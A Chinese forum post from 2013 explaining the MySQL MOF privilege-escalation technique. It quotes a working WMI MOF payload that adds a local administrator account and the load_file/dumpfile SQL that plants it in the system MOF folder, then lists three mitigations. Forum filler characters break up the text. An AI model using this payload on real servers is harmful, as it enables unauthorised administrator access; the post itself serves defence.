标题: Mysql mof扩展漏洞实例与防范 [打印本页] 作者: admin 时间: 2013-1-4 19:49 标题: Mysql mof扩展漏洞实例与防范 Mysql mof扩展漏洞防范方法 * }, l t9 G' W. c& L2 T, T( k' \: K" [1 k$ K% H; c. M
网上公开的一些利用代码:+ r( ~8 i0 i& ]; I! l9 e4 m( F
" t* O( A3 q1 ?0 e. g) T2 ]- E s#pragma namespace(“\\\\.\\root\\subscription”)# ?3 W0 k8 g* f0 P
, i; k8 h* X' l4 Dinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };8 O8 p& {0 ]% C) h
& \: f% W% w" f; S O4 H7 G( @
, k7 c4 @% E( g, U1 U& p
I, g9 v+ ^& l- n# G
& c! _3 m8 O1 [& ?0 Q( J' u }3 f. Q* D `. u
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’; ; ^2 x2 G" O* s' k. b4 [7 h3 G' h从上面代码来看得出解决办法:( O# n- s0 V9 m5 }2 q- T
: r S- r; a* }" e
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数' P) T! b4 S$ W# v- q
# b# m9 w; p/ U, W- M. g2、禁止使用”WScript.Shel”组件 ; ~1 i% z+ C: M' b1 a + n$ n$ r" I/ R9 n, o( [2 r3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER4 k/ c& t0 J- p: i6 C, _0 K2 N; ]9 R